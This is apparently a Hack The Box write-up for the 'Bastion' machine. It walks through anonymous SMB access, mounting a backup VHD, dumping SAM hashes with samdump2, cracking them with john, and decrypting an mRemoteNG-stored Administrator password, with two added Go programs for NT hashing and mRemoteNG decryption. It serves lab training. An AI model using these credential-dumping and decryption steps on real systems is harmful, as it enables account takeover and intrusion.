Box: Bastion
Level: Easy
OS: Windows
Let's get started.
Recon
Portscanning
command:sudo nmap -A 10.129.153.193 -T4  -v -p-
Nmap scan report for 10.129.153.193
Host is up (0.16s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Only four of these ports matter for now: 22 (OpenSSH for Windows, which is unusual on a Windows box and will be handy once we have a password), 135 (MSRPC), 139 (NetBIOS) and 445 (SMB). Ports 5985 and 47001 are the WinRM/HTTPAPI listeners and the high ports are RPC endpoints. Enumeration will focus on SMB on port 445.
Enumeration
We can start off by listing the shares available on the SMB server:
command:smbclient -L 10.129.153.193
This prompts for a password. Just hit Enter: the server accepts a null session, so no credentials are needed.
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ smbclient -L 10.129.153.193
Password for [WORKGROUP\bl4ck4non]:
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.153.193 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Four shares are available. ADMIN$, C$ and IPC$ are the standard administrative shares (and C$ and ADMIN$ will not open without admin credentials); Backups is a custom share, so that is where we look first. Let's connect to it to see what files it holds:
command:smbclient //10.129.153.193/Backups
Again this prompts for a password; just hit Enter.
The share holds a note.txt, an empty SDT65CB.tmp and a WindowsImageBackup directory. Walking down that directory (WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351) we find two .vhd disk images, i.e. a full Windows Server Backup of the machine.
The obvious move is to pull them down with get, but that is not really practical: the images are several gigabytes, and note.txt warns that transferring the whole backup over the link is a bad idea (it is slow).
That does not stop us from mounting them, though. If we mount the share itself and then attach the VHD straight from the mount, only the blocks we actually read cross the network.
Now that we know the way to go, let's exploit.
Exploitation
We can start by creating a directory we want the file to be mounted to
command:sudo mkdir /mnt/bastion_backup
Then we can mount,
command:sudo mount -t cifs //10.129.153.193/Backups /mnt/bastion_backup
mount.cifs prompts for the password of root (the user running sudo) on the share; as before, just press Enter for a null session.
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ sudo mkdir /mnt/bastion_backup             
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ sudo mount -t cifs //10.129.153.193/Backups /mnt/bastion_backup 
Password for root@//10.129.153.193/Backups: 
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ cd /mnt/bastion_backup 
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[/mnt/bastion_backup]
└─$ ls -la                
total 9
drwxr-xr-x 2 root root 4096 Apr 16  2019 .
drwxr-xr-x 3 root root 4096 Sep 17 04:47 ..
-r-xr-xr-x 1 root root  116 Apr 16  2019 note.txt
-rwxr-xr-x 1 root root    0 Feb 22  2019 SDT65CB.tmp
drwxr-xr-x 2 root root    0 Feb 22  2019 WindowsImageBackup
The mount worked, and the VHD files are now reachable under WindowsImageBackup on the local filesystem.
Next, mount the VHD itself. This needs qemu-nbd, which exposes a disk image as a block device, so install the tools first:
command:sudo apt-get install qemu-utils
Next is to load the NBD (Network Block Device) Module,
command:sudo modprobe nbd
Now we can attach the VHD to the block device (the larger of the two images is the one holding the C: volume). If you only want to read from the image, add qemu-nbd's read-only flag (-r) so nothing in the backup gets modified.
command:sudo qemu-nbd -c /dev/nbd0 /mnt/bastion_backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
Next, list the partitions inside the image to find the NTFS volume:
command:sudo fdisk -l /dev/nbd0
create a mount point and mount the partition
command:sudo mkdir /mnt/vhd_mount
command:sudo mount /dev/nbd0pX /mnt/vhd_mount
Replace X with the appropriate partition number based on the output of fdisk. In my case it’s nbd0p1
Now, we can access the mounted VHD
Nice stuff hehe😎
Going through the files on the disk, I found the registry hives under Windows\System32\config, which is where Windows always keeps them. Two of them matter here: SAM (Security Accounts Manager), which holds the local accounts and their NTLM hashes, and SYSTEM, which holds the boot key that the hashes in SAM are encrypted with. One without the other is useless, so we need both.
Let's navigate there.
Copy SAM and SYSTEM out of the mounted image into the working directory (a plain copy as root is enough), so they survive unmounting the VHD.
With both hives in hand we can dump the hashes using samdump2, which takes the SYSTEM hive first and the SAM hive second and prints the accounts in pwdump format:
command:samdump2 SYSTEM SAM
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ samdump2 SYSTEM SAM 
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Three accounts come out. Administrator and Guest are flagged as disabled, and their NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known hash of the empty string, so there is nothing to crack there. The first hash field on every line, aad3b435b51404eeaad3b435b51404ee, is the empty LM hash, meaning LM hashes are not stored at all. That leaves L4mpje's NT hash, which we can crack with john in NT format:
command:john hash.txt  --wordlist=/home/bl4ck4non/Documents/rockyou.txt  --format=NT
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ nano hash.txt                                 
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ cat hash.txt                                                 
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ john hash.txt  --wordlist=/home/bl4ck4non/Documents/rockyou.txt  --format=NT  
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje     (L4mpje)     
1g 0:00:00:01 DONE (2023-09-17 14:51) 0.6329g/s 5946Kp/s 5946Kc/s 5946KC/s burg772v..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 
John cracked it within a second: L4mpje's password is bureaulampje. Since OpenSSH is listening on port 22, we can SSH in as L4mpje with that password (ssh L4mpje@10.129.153.193) and collect the user flag.
That gives us user access. Next, let's escalate our privileges.
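As an added example (not part of the original write-up), here is a way to double-check what samdump2 and john told us without trusting either tool: recompute the NT hashes ourselves. An NT hash is MD4 over the UTF-16LE encoding of the password, so both the empty-string hash on the disabled accounts and the bureaulampje hash can be reproduced directly. It is written in Go with only the standard library, which means MD4 is implemented inline (Go ships it only in x/crypto); the samdump2 lines are copied from the output above.

```go
// Added example, not part of the original write-up: recompute NT hashes in
// pure Go (standard library only) to check what samdump2 and john reported.
package main

import (
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"strings"
	"unicode/utf16"
)

// md4 implements RFC 1320. NT hashes are MD4 over the UTF-16LE password.
func md4(msg []byte) [16]byte {
	st := [4]uint32{0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476}
	// Padding: 0x80, zeros up to 56 mod 64, then the bit length as a little-endian uint64.
	p := append(append([]byte{}, msg...), 0x80)
	for len(p)%64 != 56 {
		p = append(p, 0)
	}
	var l [8]byte
	binary.LittleEndian.PutUint64(l[:], uint64(len(msg))*8)
	p = append(p, l[:]...)

	rotl := func(x uint32, s uint) uint32 { return x<<s | x>>(32-s) }
	s1, s2, s3 := [4]uint{3, 7, 11, 19}, [4]uint{3, 5, 9, 13}, [4]uint{3, 9, 11, 15}
	k3 := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}

	for off := 0; off < len(p); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(p[off+4*i:])
		}
		w := st
		// In every round the roles rotate a,b,c,d -> d,a,b,c -> c,d,a,b -> b,c,d,a;
		// ai is the slot being updated, the other three follow it cyclically.
		for i := 0; i < 16; i++ { // round 1: F = (b & c) | (^b & d), words in order
			ai := (4 - i%4) % 4
			b, c, d := w[(ai+1)%4], w[(ai+2)%4], w[(ai+3)%4]
			w[ai] = rotl(w[ai]+((b&c)|(^b&d))+x[i], s1[i%4])
		}
		for i := 0; i < 16; i++ { // round 2: G = majority(b,c,d), words 0,4,8,12,1,5,...
			ai := (4 - i%4) % 4
			b, c, d := w[(ai+1)%4], w[(ai+2)%4], w[(ai+3)%4]
			w[ai] = rotl(w[ai]+((b&c)|(b&d)|(c&d))+x[(i%4)*4+i/4]+0x5a827999, s2[i%4])
		}
		for i := 0; i < 16; i++ { // round 3: H = b ^ c ^ d, words in k3 order
			ai := (4 - i%4) % 4
			b, c, d := w[(ai+1)%4], w[(ai+2)%4], w[(ai+3)%4]
			w[ai] = rotl(w[ai]+(b^c^d)+x[k3[i]]+0x6ed9eba1, s3[i%4])
		}
		for i := range st {
			st[i] += w[i]
		}
	}
	var out [16]byte
	for i, v := range st {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// md4Hex lets us check the implementation against the RFC 1320 test vectors.
func md4Hex(s string) string { d := md4([]byte(s)); return hex.EncodeToString(d[:]) }

// ntHash is what the SAM stores: MD4 over the UTF-16LE encoding of the password.
func ntHash(password string) string {
	units := utf16.Encode([]rune(password))
	buf := make([]byte, 2*len(units))
	for i, u := range units {
		binary.LittleEndian.PutUint16(buf[2*i:], u)
	}
	d := md4(buf)
	return hex.EncodeToString(d[:])
}

// samdumpLines: the pwdump-format lines samdump2 printed above.
var samdumpLines = []string{
	"*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
	"*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
	"L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::",
}

// classify labels each account "empty" (NT hash of ""), "cracked:<pw>" when a
// candidate reproduces the hash, or "unknown". This is john's job, one guess at a time.
func classify(lines, candidates []string) map[string]string {
	res := map[string]string{}
	for _, ln := range lines {
		f := strings.Split(ln, ":")
		if len(f) < 4 {
			continue
		}
		user, nt := strings.TrimPrefix(f[0], "*disabled* "), strings.ToLower(f[3])
		res[user] = "unknown"
		if nt == ntHash("") {
			res[user] = "empty"
			continue
		}
		for _, pw := range candidates {
			if ntHash(pw) == nt {
				res[user] = "cracked:" + pw
			}
		}
	}
	return res
}

func main() {
	for user, verdict := range classify(samdumpLines, []string{"bureaulampje"}) {
		fmt.Printf("%-14s %s\n", user, verdict)
	}
}
```

The same check is useful the other way round: when a dump shows an enabled account with the 31d6cfe0... hash, that account has a blank password and does not need cracking at all.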
Privilege Escalation
Looking through C:\Program Files (x86) on the box, I found mRemoteNG installed. It is a remote connection manager (RDP, SSH, VNC and so on) that saves the credentials of every configured connection in its configuration file, encrypted rather than hashed.
A bit of research shows that this file is confCons.xml, kept under the user's AppData\Roaming\mRemoteNG directory.
A quick recursive search from C:\ with dir /s /b confCons.xml locates it.
Cool, we have the full path. To view the contents of the file:
command:type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
The file holds a connection entry for the Administrator user whose Password attribute is a base64 blob. mRemoteNG encrypts that blob with a built-in default master password unless the user configured their own, so this is a decryption job rather than a cracking job.
The mRemoteNG-Decrypt tool does exactly that. You can get it from the repo shown below.
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ git clone https://github.com/haseebT/mRemoteNG-Decrypt.git                        
Cloning into 'mRemoteNG-Decrypt'...
remote: Enumerating objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19
Receiving objects: 100% (19/19), 14.80 KiB | 105.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ cd mRemoteNG-Decrypt                    
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion/mRemoteNG-Decrypt]
└─$ ls
LICENSE  mremoteng_decrypt.py  README.md
                                                                                                                                                                                                
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion/mRemoteNG-Decrypt]
└─$ python mremoteng_decrypt.py 
usage: mremoteng_decrypt.py [-h] [-f FILE | -s STRING] [-p PASSWORD]
Decrypt mRemoteNG passwords.
options:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  name of file containing mRemoteNG password
  -s STRING, --string STRING
                        base64 string of mRemoteNG password
  -p PASSWORD, --password PASSWORD
                        Custom password
To decrypt the password (with no -p given, the tool falls back to mRemoteNG's default master password):
command:python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
That gives us the Administrator's password in clear text; since it is decrypted rather than brute-forced, this takes a second no matter how strong the password is. Now we can SSH into the server as the Administrator user (note that the target had a different IP address by the time of this session):
command:ssh Administrator@10.129.76.187
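What the decrypt script is doing under the hood, as an added example written for this page rather than taken from the tool or from mRemoteNG: the blob layout, the PBKDF2 key derivation and the AES-GCM step, in Go so that only the standard library is needed. The layout (16-byte salt, 16-byte nonce, ciphertext, 16-byte tag; key from PBKDF2-HMAC-SHA1 with 1000 iterations; the salt doubles as associated data; default master password mR3m) is mRemoteNG's 1.75+ AES-GCM format as I understand it and is stated here as an assumption; older 1.74 installs used an AES-CBC scheme that this code does not handle. The wrong-password and custom-master cases show why setting your own master password in mRemoteNG defeats this trick.

```go
// Added example, not the tool used above: decrypt an mRemoteNG password blob
// with only the Go standard library, to show what mremoteng_decrypt.py does.
// Assumed blob layout (mRemoteNG 1.75+, AES-256-GCM provider):
//   base64( salt[16] || nonce[16] || ciphertext || tag[16] )
// key = PBKDF2-HMAC-SHA1(master, salt, 1000 iterations, 32 bytes), AAD = salt.
// The master password defaults to "mR3m" unless the user set one in mRemoteNG.
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha1"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

const defaultMaster = "mR3m"

// confConsBlob is the Password attribute read from confCons.xml above.
const confConsBlob = "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

// pbkdf2SHA1 is PBKDF2 (RFC 8018) with HMAC-SHA1; x/crypto has one, the std lib does not.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		var idx [4]byte
		binary.BigEndian.PutUint32(idx[:], block)
		mac.Write(idx[:])
		u := mac.Sum(nil)           // U1 = PRF(P, S || INT(block))
		t := append([]byte{}, u...) // T = U1 ^ U2 ^ ... ^ U_iter
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// decryptMRemoteNG returns the plaintext password, or an error when the blob is
// malformed or the master password is wrong (the GCM tag check fails).
func decryptMRemoteNG(b64, master string) (string, error) {
	blob, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(blob) < 48 {
		return "", errors.New("blob too short for salt+nonce+tag")
	}
	salt, nonce, ctWithTag := blob[:16], blob[16:32], blob[32:]
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(master), salt, 1000, 32))
	if err != nil {
		return "", err
	}
	gcm, err := cipher.NewGCMWithNonceSize(block, 16) // mRemoteNG uses a 128-bit nonce, not GCM's usual 96
	if err != nil {
		return "", err
	}
	pt, err := gcm.Open(nil, nonce, ctWithTag, salt)
	if err != nil {
		return "", fmt.Errorf("decrypt failed (wrong master password?): %w", err)
	}
	return string(pt), nil
}

// encryptMRemoteNG produces a blob in the same layout; used here to show that a
// user-chosen master password defeats the default-password trick.
func encryptMRemoteNG(plaintext, master string) (string, error) {
	rnd := make([]byte, 32)
	if _, err := rand.Read(rnd); err != nil {
		return "", err
	}
	salt, nonce := rnd[:16], rnd[16:]
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(master), salt, 1000, 32))
	if err != nil {
		return "", err
	}
	gcm, err := cipher.NewGCMWithNonceSize(block, 16)
	if err != nil {
		return "", err
	}
	out := append(append(append([]byte{}, salt...), nonce...), gcm.Seal(nil, nonce, []byte(plaintext), salt)...)
	return base64.StdEncoding.EncodeToString(out), nil
}

func main() {
	pw, err := decryptMRemoteNG(confConsBlob, defaultMaster)
	fmt.Println("default master password:", pw, err)
	_, err = decryptMRemoteNG(confConsBlob, "not-the-master")
	fmt.Println("wrong master password:", err)
	custom, _ := encryptMRemoteNG("hunter2", "MyOwnMaster!") // constructed sample, not from the box
	_, err = decryptMRemoteNG(custom, defaultMaster)
	fmt.Println("custom master, decrypted with default:", err)
}
```

The salt is authenticated as associated data, so tampering with it or using the wrong master password both surface as a tag failure rather than as garbage output, which is why the tool can tell you cleanly when a custom master password is in use.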
Box Pwned Successfully😎
That will be all for today